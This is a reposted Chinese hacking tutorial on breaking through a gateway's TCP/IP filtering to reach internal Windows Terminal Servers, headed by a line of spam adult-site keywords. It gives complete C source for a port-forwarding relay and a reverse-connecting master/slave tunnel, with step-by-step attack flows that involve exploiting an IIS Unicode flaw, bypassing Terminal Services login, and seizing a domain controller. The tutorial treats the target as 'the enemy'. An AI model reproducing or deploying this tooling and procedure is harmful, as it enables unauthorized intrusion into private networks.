中文字幕在线观看,亚洲а∨天堂久久精品9966,亚洲成a人片在线观看你懂的,亚洲av成人片无码网站,亚洲国产精品无码久久久五月天

編程突破TCP/IP過濾防火墻進(jìn)入內(nèi)網(wǎng)

2017-11-30    來源:

容器云強(qiáng)勢(shì)上線!快速搭建集群,上萬Linux鏡像隨意使用

  現(xiàn)在很多企業(yè)或者公司基本上網(wǎng)方式基本上都是申請(qǐng)一條連接到Internet的線路,寬帶、DDN、ADSL、ISDN等等,然后用一臺(tái)服務(wù)器做網(wǎng)關(guān),服務(wù)器兩塊網(wǎng)卡,一塊是連接到Internet,另一塊是連接到內(nèi)網(wǎng)的HUB或者交換機(jī),然后內(nèi)網(wǎng)的其他機(jī)器就可以通過網(wǎng)關(guān)連接到Internet。

  也許有些人會(huì)這樣想,我在內(nèi)網(wǎng)之中,我們之間沒有直接的連接,你沒有辦法攻擊我。事實(shí)并非如此,在內(nèi)網(wǎng)的機(jī)器同樣可能遭受到來自Internet的攻擊,當(dāng)然前提是攻擊者已經(jīng)取得網(wǎng)關(guān)服務(wù)器的某些權(quán)限,呵呵,這是不是廢話?其實(shí),Internet上很多做網(wǎng)關(guān)的服務(wù)器并未經(jīng)過嚴(yán)格的安全配置,要獲取權(quán)限也不是想象中的那么難。

  Ok!廢話就不說了,切入正題。我們的目標(biāo)是用我們的TermClient[M$終端服務(wù)客戶端]連接到敵人內(nèi)網(wǎng)的TermServer機(jī)器。M$的終端服務(wù)是一個(gè)很好的遠(yuǎn)程管理工具,不是嗎?呵呵。沒有做特別說明的話,文中提到的服務(wù)器OS都為windows 2000。服務(wù)器為L(zhǎng)inux或其他的話,原理也差不多,把程序稍微修改就行了。

  假設(shè)敵人網(wǎng)絡(luò)拓?fù)淙缦聢D所示,沒有安裝防火墻或在網(wǎng)關(guān)服務(wù)器上做TCP/IP限制。

  我們的目標(biāo)是連接上敵人內(nèi)網(wǎng)的Terminal Server[192.168.1.3],因?yàn)闆]有辦法直接和他建立連接,那么只有先從它的網(wǎng)關(guān)服務(wù)器上下手了。假如敵人網(wǎng)關(guān)服務(wù)器是M$的windows 2k,IIS有Unicode漏洞[現(xiàn)在要找些有漏洞的機(jī)器太容易了,但我只是scripts kid,只會(huì)利用現(xiàn)成的漏洞做些簡(jiǎn)單的攻擊:(555),那么我們就得到一個(gè)網(wǎng)關(guān)的shell了,我們可以在那上面運(yùn)行我們的程序,雖然權(quán)限很低,但也可以做很多事情了。Ok!讓我們來寫一個(gè)做TCP socket數(shù)據(jù)轉(zhuǎn)發(fā)的小程序,讓敵人的網(wǎng)關(guān)服務(wù)器忠實(shí)的為我[202.1.1.1]和敵人內(nèi)網(wǎng)的TermServer[192.168.1.3]之間轉(zhuǎn)發(fā)數(shù)據(jù)。題外話:實(shí)際入侵過程是先取得網(wǎng)關(guān)服務(wù)器的權(quán)限,然后用他做跳板,進(jìn)一步摸清它的內(nèi)部網(wǎng)絡(luò)拓?fù)浣Y(jié)構(gòu),再做進(jìn)一步的入侵,現(xiàn)在敵人的網(wǎng)絡(luò)拓?fù)涫俏覀兘o他設(shè)計(jì)的。

  攻擊流程如下:

  <1>在網(wǎng)關(guān)服務(wù)器202.2.2.2運(yùn)行我們的程序AgentGateWay,他監(jiān)聽TCP 3389端口[改成別的,那我們就要相應(yīng)的修改TermClient了]等待我們?nèi)ミB接。

  <2>我們202.1.1.1用TermClient連接到202.2.2.2:3389。

  <3>202.2.2.2.接受202.1.1.1的連接,然后再建立一個(gè)TCP socket連接到自己內(nèi)網(wǎng)的TermServer[192.168.1.3]

  <4>這樣我們和敵人內(nèi)網(wǎng)的TermServer之間的數(shù)據(jù)通道就建好了,接下來網(wǎng)關(guān)就忠實(shí)的為我們轉(zhuǎn)發(fā)數(shù)據(jù)啦。當(dāng)我們連接到202.2.2.2:3389的時(shí)候,其實(shí)出來的界面是敵人內(nèi)網(wǎng)的192.168.1.3,感覺怎么樣?

  程序代碼如下:

/**********************************************************************
Module Name:AgentGateWay.c
Date:2001/4/15
CopyRight(c) eyas
說明:端口重定向工具,在網(wǎng)關(guān)上運(yùn)行,把端口重定向到內(nèi)網(wǎng)的IP、PORT,
就可以進(jìn)入內(nèi)網(wǎng)了
sock[0]==>sClient sock[1]==>sTarget
**********************************************************************/
#include
#include
#include "TCPDataRedird.c"
#define TargetIP TEXT("192.168.1.3")
#define TargetPort (int)3389
#define ListenPort (int)3389//監(jiān)聽端口
#pragma comment(lib,"ws2_32.lib")
int main()
{
 WSADATA wsd;
 SOCKET sListen=INVALID_SOCKET,//本機(jī)監(jiān)聽的socket
 sock[2];
 struct sockaddr_in Local,Client,Target;
 int iAddrSize;
 HANDLE hThreadC2T=NULL,//C2T=ClientToTarget
 hThreadT2C=NULL;//T2C=TargetToClient
 DWORD dwThreadID;
 __try
 {
  if(WSAStartup(MAKEWORD(2,2),&wsd)!=0)
  {
   printf("\nWSAStartup() failed:%d",GetLastError());
   __leave;
  }
  sListen=socket(AF_INET,SOCK_STREAM,IPPROTO_IP);
  if(sListen==INVALID_SOCKET)
  {
   printf("\nsocket() failed:%d",GetLastError());
   __leave;
  }
  Local.sin_addr.s_addr=htonl(INADDR_ANY);
  Local.sin_family=AF_INET;
  Local.sin_port=htons(ListenPort);
  Target.sin_family=AF_INET;
  Target.sin_addr.s_addr=inet_addr(TargetIP);
  Target.sin_port=htons(TargetPort);

  if(bind(sListen,(struct sockaddr *)&Local,sizeof(Local))==SOCKET_ERROR)
  {
   printf("\nbind() failed:%d",GetLastError());
   __leave;
  }
  if(listen(sListen,1)==SOCKET_ERROR)
  {
   printf("\nlisten() failed:%d",GetLastError());
   __leave;
  }
  //scoket循環(huán)
  while(1)
  {
   printf("\n\n*************Waiting Client Connect to**************\n\n");
   iAddrSize=sizeof(Client);
   //get socket sClient
   sock[0]=accept(sListen,(struct sockaddr *)&Client,&iAddrSize);
   if(sock[0]==INVALID_SOCKET)
   {
    printf("\naccept() failed:%d",GetLastError());
    break;
   }
   printf("\nAccept client==>%s:%d",inet_ntoa(Client.sin_addr), ntohs(Client.sin_port));
   //create socket sTarget
   sock[1]=socket(AF_INET,SOCK_STREAM,IPPROTO_IP);
   if(sock[1]==INVALID_SOCKET)
   {
    printf("\nsocket() failed:%d",GetLastError());
    __leave;
   }
   //connect to target port
   if(connect(sock[1],(struct sockaddr *)&Target,sizeof(Target))==SOCKET_ERROR)
   {
    printf("\nconnect() failed:%d",GetLastError());
    __leave;
   }
   printf("\nconnect to target 3389 success!");
   //創(chuàng)建兩個(gè)線程進(jìn)行數(shù)據(jù)轉(zhuǎn)發(fā)
   hThreadC2T=CreateThread(NULL,0,TCPDataC2T,(LPVOID)sock,0,&dwThreadID);
   hThreadT2C=CreateThread(NULL,0,TCPDataT2C,(LPVOID)sock,0,&dwThreadID);
   //等待兩個(gè)線程結(jié)束
   WaitForSingleObject(hThreadC2T,INFINITE);
   WaitForSingleObject(hThreadT2C,INFINITE);
   CloseHandle(hThreadC2T);
   CloseHandle(hThreadT2C);
   closesocket(sock[1]);
   closesocket(sock[0]);
   printf("\n\n*****************Connection Close*******************\n\n");
  }//end of sock外循環(huán)
 }//end of try
 __finally
 {
  if(sListen!=INVALID_SOCKET) closesocket(sListen);
  if(sock[0]!=INVALID_SOCKET) closesocket(sock[0]);
  if(sock[1]!=INVALID_SOCKET) closesocket(sock[1]);
  if(hThreadC2T!=NULL) CloseHandle(hThreadC2T);
  if(hThreadT2C!=NULL) CloseHandle(hThreadT2C);
  WSACleanup();
 }
 return 0;
}
/*************************************************************************
Module:TCPDataRedird.c
Date:2001/4/16
CopyRight(c) eyas
HomePage:www.patching.net
Thanks to shotgun
說明:TCP socket數(shù)據(jù)轉(zhuǎn)發(fā),sock[0]==>sClient sock[1]==>sTarget
*************************************************************************/
#define BuffSize 20*1024 //緩沖區(qū)大小20k
//此函數(shù)負(fù)責(zé)從Client讀取數(shù)據(jù),然后轉(zhuǎn)發(fā)給Target
DWORD WINAPI TCPDataC2T(SOCKET* sock)
{
 int iRet,
 ret=-1,//select 返回值
 iLeft,
 idx,
 iSTTBCS=0;//STTBCS=SendToTargetBuffCurrentSize
 char szSendToTargetBuff[BuffSize]=,
 szRecvFromClientBuff[BuffSize]=;
 fd_set fdread,fdwrite;
 printf("\n\n*****************Connection Active*******************\n\n");
 while(1)
 {
  FD_ZERO(&fdread);
  FD_ZERO(&fdwrite);
  FD_SET(sock[0],&fdread);
  FD_SET(sock[1],&fdwrite);
  if((ret=select(0,&fdread,&fdwrite,NULL,NULL))==SOCKET_ERROR)
  {
   printf("\nselect() failed:%d",GetLastError());
   break;
  }
  //printf("\nselect() return value ret=%d",ret);
  if(ret>0)
  {
   //sClinet可讀,client有數(shù)據(jù)要發(fā)送過來
   if(FD_ISSET(sock[0],&fdread))
   {
    //接收sock[0]發(fā)送來的數(shù)據(jù)
    iRet=recv(sock[0],szRecvFromClientBuff,BuffSize,0);
    if(iRet==SOCKET_ERROR)
    {
     printf("\nrecv() from sock[0] failed:%d",GetLastError());
     break;
    }
    else if(iRet==0)
     break;
    printf("\nrecv %d bytes from sClinet.",iRet);
    //把從client接收到的數(shù)據(jù)存添加到發(fā)往target的緩沖區(qū)
    memcpy(szSendToTargetBuff+iSTTBCS,szRecvFromClientBuff,iRet);
    //刷新發(fā)往target的數(shù)據(jù)緩沖區(qū)當(dāng)前buff大小
    iSTTBCS+=iRet;
    //清空接收client數(shù)據(jù)的緩沖區(qū)
    memset(szRecvFromClientBuff,0,BuffSize);
   }
   //sTarget可寫,把從client接收到的數(shù)據(jù)發(fā)送到target
   if(FD_ISSET(sock[1],&fdwrite))
   {
    //轉(zhuǎn)發(fā)數(shù)據(jù)到target的3389端口
    iLeft=iSTTBCS;
    idx=0;
    while(iLeft>0)
    {
     iRet=send(sock[1],&szSendToTargetBuff[idx],iLeft,0);
     if(iRet==SOCKET_ERROR)
     {
      printf("\nsend() to target failed:%d",GetLastError());
      break;
     }
     printf("\nsend %d bytes to target",iRet);
     iLeft-=iRet;
     idx+=iRet;
    }
    //清空緩沖區(qū)
    memset(szSendToTargetBuff,0,BuffSize);
    //重置發(fā)往target的數(shù)據(jù)緩沖區(qū)當(dāng)前buff大小
    iSTTBCS=0;
   }
  }//end of select ret
  Sleep(1);
 }//end of data send & recv循環(huán)
 return 0;
}
//此函數(shù)負(fù)責(zé)從target讀取數(shù)據(jù),然后發(fā)送給client
DWORD WINAPI TCPDataT2C(SOCKET* sock)
{
 int iRet,
 ret=-1,//select 返回值
 iLeft,
 idx,
 iSTCBCS=0;//STCBCS=SendToClientBuffCurrentSize
 char szRecvFromTargetBuff[BuffSize]=,
 szSendToClientBuff[BuffSize]=;
 fd_set fdread,fdwrite;

 while(1)
 {
  FD_ZERO(&fdread);
  FD_ZERO(&fdwrite);
  FD_SET(sock[0],&fdwrite);
  FD_SET(sock[1],&fdread);
  if((ret=select(0,&fdread,&fdwrite,NULL,NULL))==SOCKET_ERROR)
  {
   printf("\nselect() failed:%d",GetLastError());
   break;
  }
  if(ret>0)
  {
   //sTarget可讀,從target接收數(shù)據(jù)
   if(FD_ISSET(sock[1],&fdread))
   {
    //接收target返回?cái)?shù)據(jù)
    iRet=recv(sock[1],szRecvFromTargetBuff,BuffSize,0);
    if(iRet==SOCKET_ERROR)
    {
     printf("\nrecv() from target failed:%d",GetLastError());
     break;
    }
    else if(iRet==0)
     break;
    printf("\nrecv %d bytes from target",iRet);
    //把從target接收到的數(shù)據(jù)添加到發(fā)送到client的緩沖區(qū)
    memcpy(szSendToClientBuff+iSTCBCS,szRecvFromTargetBuff,iRet);
    //清空接收target返回?cái)?shù)據(jù)緩沖區(qū)
    memset(szRecvFromTargetBuff,0,BuffSize);
    //刷新發(fā)送到client的數(shù)據(jù)緩沖區(qū)當(dāng)前大小
    iSTCBCS+=iRet;
   }
   //client可寫,發(fā)送target返回?cái)?shù)據(jù)到client
   if(FD_ISSET(sock[0],&fdwrite))
   {
    //發(fā)送target返回?cái)?shù)據(jù)到client
    iLeft=iSTCBCS;
    idx=0;
    while(iLeft>0)
    {
     iRet=send(sock[0],&szSendToClientBuff[idx],iLeft,0);
     if(iRet==SOCKET_ERROR)
     {
      printf("\nsend() to Client failed:%d",GetLastError());
      break;
     }
     printf("\nsend %d bytes to Client",iRet);
     iLeft-=iRet;
     idx+=iRet;
    }
    //清空緩沖區(qū)
    memset(szSendToClientBuff,0,BuffSize);
    iSTCBCS=0;
   }
  }//end of select ret
  Sleep(1);
 }//end of while
 return 0;
}
  利用TCP socket轉(zhuǎn)發(fā)和反彈TCP端口進(jìn)入有防火墻保護(hù)的內(nèi)網(wǎng)

  事實(shí)上很多內(nèi)網(wǎng)沒有上面所說的那么簡(jiǎn)單啦,我們來看一個(gè)有防火墻保護(hù)的內(nèi)網(wǎng),前提是這個(gè)防火墻對(duì)反彈TCP端口不做限制,限制了的話,又另當(dāng)別論了。假設(shè)網(wǎng)絡(luò)拓?fù)淙缦拢?

  上面的網(wǎng)絡(luò)拓?fù)涫俏以谝淮螌?duì)朋友公司網(wǎng)站授權(quán)入侵過程中遇到的。

  〈1〉我自己處于公司內(nèi)網(wǎng)192.168.0.2,通過公司網(wǎng)關(guān)202.1.1.1到Internet,但我是網(wǎng)關(guān)的admin:)。

  〈2〉敵人[其實(shí)是friend啦]的網(wǎng)關(guān)OS是2k adv server,在外網(wǎng)網(wǎng)卡上做了TCP/IP限制,只開放了25,53,80,110,3306這幾個(gè)TCP
PORT,通過一個(gè)漏洞,我得到了一個(gè)shell,可以通過IE來執(zhí)行系統(tǒng)命令,雖然權(quán)限很低。網(wǎng)關(guān)有終端服務(wù),登陸驗(yàn)證漏洞補(bǔ)丁未安裝,但輸入法幫助文件已經(jīng)被刪除了,但是我們可以通過shell把輸入法幫助文件upload上去,因?yàn)樗南到y(tǒng)權(quán)限沒有設(shè)置好,我們可以寫,呵呵。這樣的話,我們只要能夠連接到他的終端服務(wù)上去,我們就能繞過登陸驗(yàn)證,得到admin權(quán)限了。如何連接?有辦法,用TCP
socket轉(zhuǎn)發(fā)。和第一部分說的一樣嗎?有些不同。因?yàn)樗隽薚CP/IP限制,我們不能連接他,只能讓他來連接我們了,TCP反彈端口,呵呵。
攻擊流程如下:

  〈1〉在我的服務(wù)器202.1.1.1運(yùn)行AgentMaster,監(jiān)聽TCP PORT 12345,等待202.2.2.2來連接,監(jiān)聽TCP PORT 3389,等待我192.168.0.2連接。

  〈2〉在敵人網(wǎng)關(guān)機(jī)器202.2.2.2運(yùn)行AgentSlave,連接到202.1.1.1 TCP PORT 12345[注意:是反彈端口,TCP/IP過濾也拿他沒辦法]

  〈3〉我自己192.168.0.2用TermClient連接到自己的服務(wù)器202.1.1.1:3389

  〈4〉敵人網(wǎng)關(guān)上的AgentSlave連接到自己本身在內(nèi)網(wǎng)的IP==〉192.168.1.1:3389

  〈5〉數(shù)據(jù)通道就建立好啦。兩個(gè)代理忠實(shí)的為我們轉(zhuǎn)發(fā)數(shù)據(jù),呵呵。當(dāng)我們連接自己服務(wù)器的3389,其實(shí)出來的是敵人內(nèi)網(wǎng)的某臺(tái)機(jī)器。

  后來發(fā)現(xiàn)敵人的主域控制器是192.168.1.4,通過前面與他網(wǎng)關(guān)建立的連接,利用一個(gè)漏洞輕易的取得主域的admin權(quán)限,呵呵。他可能認(rèn)為主域在內(nèi)網(wǎng),網(wǎng)關(guān)又做了TCP/IP過濾,攻擊者沒有辦法進(jìn)入。我只要把AgentSlave設(shè)置為連接192.168.1.4:3389,以后就可以直接連接他的主域控制器啦,不過在網(wǎng)關(guān)登陸也一樣。

  程序代碼如下[程序中所用到的TCPDataRedird.c已經(jīng)貼在第一部分,那個(gè)文件做數(shù)據(jù)轉(zhuǎn)發(fā),通用的:

/******************************************************************************
Module Name:AgentMaster.c
Date:2001/4/16
CopyRight(c) eyas
說明:scoket代理主控端,負(fù)責(zé)監(jiān)聽兩個(gè)TCP socket,等待攻擊者和AgentSlave來連接,兩個(gè)
scoket都連接成功后,開始轉(zhuǎn)發(fā)數(shù)據(jù)
sock[0]是client==〉sock[0] sock[1]是target==〉sock[1]
******************************************************************************/
#include 〈stdio.h〉
#include 〈winsock2.h〉
#include "TCPDataRedird.c"
#pragma comment(lib,"ws2_32.lib")
#define TargetPort 3389//偽裝的target的監(jiān)聽端口
#define LocalPort 12345//等待AgentSlave來connect的端口
int main()
{
 WSADATA wsd;
 SOCKET s3389=INVALID_SOCKET,//本機(jī)監(jiān)聽的socket,等待攻擊者連接
 s1981=INVALID_SOCKET,//監(jiān)聽的socket,等待AgentSlave來連接
 sock[2]=;
 struct sockaddr_in Local3389,Local1981,Attack,Slave;
 int iAddrSize;
 HANDLE hThreadC2T=NULL,//C2T=ClientToTarget
 hThreadT2C=NULL;//T2C=TargetToClient
 DWORD dwThreadID;
 __try
 {
  //load winsock library
  if(WSAStartup(MAKEWORD(2,2),&wsd)!=0)
  {
   printf("\nWSAStartup() failed:%d",GetLastError());
   __leave;
  }
  //create socket
  s3389=socket(AF_INET,SOCK_STREAM,IPPROTO_IP);
  if(s3389==INVALID_SOCKET)
  {
   printf("\nsocket() failed:%d",GetLastError());
   __leave;
  }
  //create socket
  s1981=socket(AF_INET,SOCK_STREAM,IPPROTO_IP);
  if(s1981==INVALID_SOCKET)
  {
   printf("\nsocket() failed:%d",GetLastError());
   __leave;
  }
  //fill the struct
  Local3389.sin_addr.s_addr=htonl(INADDR_ANY);
  Local3389.sin_family=AF_INET;
  Local3389.sin_port=htons(TargetPort);
  Local1981.sin_addr.s_addr=htonl(INADDR_ANY);
  Local1981.sin_family=AF_INET;
  Local1981.sin_port=htons(LocalPort);
  //bind s3389 for attacker
  if(bind(s3389,(struct sockaddr *)&Local3389,sizeof(Local3389))==SOCKET_ERROR)
  {
   printf("\nbind() failed:%d",GetLastError());
   __leave;
  }
  //listen for attacker to connect
  if(listen(s3389,1)==SOCKET_ERROR)
  {
   printf("\nlisten() failed:%d",GetLastError());
   __leave;
  }
  //bind s1981 for AgentSlave
  if(bind(s1981,(struct sockaddr *)&Local1981,sizeof(Local1981))==SOCKET_ERROR)
  {
   printf("\nbind() failed:%d",GetLastError());
   __leave;
  }
  //listen for AgentSlave to connect
  if(listen(s1981,1)==SOCKET_ERROR)
  {
   printf("\nlisten() failed:%d",GetLastError());
   __leave;
  }
  //socket循環(huán)
  while(1)
  {
   //wait for AgentSlave to connect
   iAddrSize=sizeof(Slave);
   sock[1]=accept(s1981,(struct sockaddr *)&Slave,&iAddrSize);
   if(sock[1]==INVALID_SOCKET)
   {
    printf("\naccept() failed:%d",GetLastError());
    break;
   }
   printf("\nAccept AgentSlave==〉%s:%d",inet_ntoa(Slave.sin_addr), ntohs(Slave.sin_port));
   //wait for Attacker to connect
   iAddrSize=sizeof(Attack);
   sock[0]=accept(s3389,(struct sockaddr *)&Attack,&iAddrSize);
   if(sock[0]==INVALID_SOCKET)
   {
    printf("\naccept() failed:%d",GetLastError());
    break;
   }
   printf("\nAccept Attacker==〉%s:%d",inet_ntoa(Attack.sin_addr), ntohs(Attack.sin_port));
   //創(chuàng)建兩個(gè)線程進(jìn)行數(shù)據(jù)轉(zhuǎn)發(fā)
   hThreadC2T=CreateThread(NULL,0,TCPDataC2T,(LPVOID)sock,0,&dwThreadID);
   hThreadT2C=CreateThread(NULL,0,TCPDataT2C,(LPVOID)sock,0,&dwThreadID);
   //等待兩個(gè)線程結(jié)束
   WaitForSingleObject(hThreadC2T,INFINITE);
   CloseHandle(hThreadC2T);
   CloseHandle(hThreadT2C);
   closesocket(sock[0]);
   closesocket(sock[1]);
  }//end of socket while
 }//end of try
 __finally
 {
  //clean all
  if(s3389!=INVALID_SOCKET) closesocket(s3389);
  if(s1981!=INVALID_SOCKET) closesocket(s1981);
  if(sock[0]!=INVALID_SOCKET) closesocket(sock[0]);
  if(sock[1]!=INVALID_SOCKET) closesocket(sock[1]);
  if(hThreadC2T!=NULL) CloseHandle(hThreadC2T);
  if(hThreadT2C!=NULL) CloseHandle(hThreadT2C);
  WSACleanup();
 }
 return 0;
}
/***********************************************************************************
Module:AgentSlave.c
Date:2001/4/17
Copyright(c)eyas
HomePage:www.patching.net
說明:這個(gè)程序負(fù)責(zé)連接最終目標(biāo),連接主控端,然后轉(zhuǎn)發(fā)數(shù)據(jù)
這里連接到AgenrMaster的socket相當(dāng)與sClient==〉sock[0],
連接到最終目標(biāo)的socoket是sTarget==〉sock[1]
***********************************************************************************/
#include 〈stdio.h〉
#include 〈winsock2.h〉
#include "TCPDataRedird.c"
#pragma comment(lib,"ws2_32.lib")
#define TargetIP "192.168.1.3"
#define TargetPort (int)3389
#define AgentMasterIP "202.1.1.1"
#define AgentMasterPort (int)12345
int main()
{
 WSADATA wsd;
 SOCKET sock[2]=;
 struct sockaddr_in Master,Target;
 HANDLE hThreadC2T=NULL,//C2T=ClientToTarget
 hThreadT2C=NULL;//T2C=TargetToClient
 DWORD dwThreadID;
 __try
 {
  //load winsock library
  if(WSAStartup(MAKEWORD(2,2),&wsd)!=0)
  {
   printf("\nWSAStartup() failed:%d",GetLastError());
   __leave;
  }
  //循環(huán)
  while(1)
  {
   //create client socket
   sock[0]=socket(AF_INET,SOCK_STREAM,IPPROTO_IP);
   if(sock[0]==INVALID_SOCKET)
   {
    printf("\nsocket() failed:%d",GetLastError());
    __leave;
   }
   //create target socket
   sock[1]=socket(AF_INET,SOCK_STREAM,IPPROTO_IP);
   if(sock[1]==INVALID_SOCKET)
   {
    printf("\nsocket() failed:%d",GetLastError());
    __leave;
   }
   //fill struct
   Target.sin_family=AF_INET;
   Target.sin_addr.s_addr=inet_addr(TargetIP);
   Target.sin_port=htons(TargetPort);
   Master.sin_family=AF_INET;
   Master.sin_addr.s_addr=inet_addr(AgentMasterIP);
   Master.sin_port=htons(AgentMasterPort);
   //connect to AgentMaster
   if(connect(sock[0],(struct sockaddr *)&Master,sizeof(Master))==SOCKET_ERROR)
   {
    //連接失敗后,等待一會(huì)兒再連
    printf("\nconnect() to master failed:%d",GetLastError());
    closesocket(sock[0]);
    closesocket(sock[1]);
    Sleep(5000);
    continue;
   }
   printf("\nconnect to %s %d success!",AgentMasterIP,AgentMasterPort);
   //connect to target
   if(connect(sock[1],(struct sockaddr *)&Target,sizeof(Target))==SOCKET_ERROR)
   {
    printf("\nconnect() to target failed:%d",GetLastError());
    __leave;
   }
   printf("\nconnect to %s %d success!",TargetIP,TargetPort);
   //創(chuàng)建兩個(gè)線程進(jìn)行數(shù)據(jù)轉(zhuǎn)發(fā)
   hThreadC2T=CreateThread(NULL,0,TCPDataC2T,(LPVOID)sock,0,&dwThreadID);
   hThreadT2C=CreateThread(NULL,0,TCPDataT2C,(LPVOID)sock,0,&dwThreadID);
   //等待兩個(gè)線程結(jié)束
   WaitForSingleObject(hThreadC2T,INFINITE);
   CloseHandle(hThreadC2T);
   CloseHandle(hThreadT2C);
   closesocket(sock[0]);
   closesocket(sock[1]);
  }//end of while
 }//end of try
 __finally
 {
  if(sock[0]!=INVALID_SOCKET) closesocket(sock[0]);
  if(sock[1]!=INVALID_SOCKET) closesocket(sock[1]);
  if(hThreadC2T!=NULL) CloseHandle(hThreadC2T);
  if(hThreadT2C!=NULL) CloseHandle(hThreadT2C);
  WSACleanup();
 }
 return 0;
}

標(biāo)簽: linux 安全 代碼 防火墻 服務(wù)器 漏洞 權(quán)限 網(wǎng)絡(luò)

版權(quán)申明:本站文章部分自網(wǎng)絡(luò),如有侵權(quán),請(qǐng)聯(lián)系:west999com@outlook.com
特別注意:本站所有轉(zhuǎn)載文章言論不代表本站觀點(diǎn)!
本站所提供的圖片等素材,版權(quán)歸原作者所有,如需使用,請(qǐng)與原作者聯(lián)系。

上一篇:微軟DirectShow漏洞遭到惡意攻擊

下一篇:DOS.SillyOR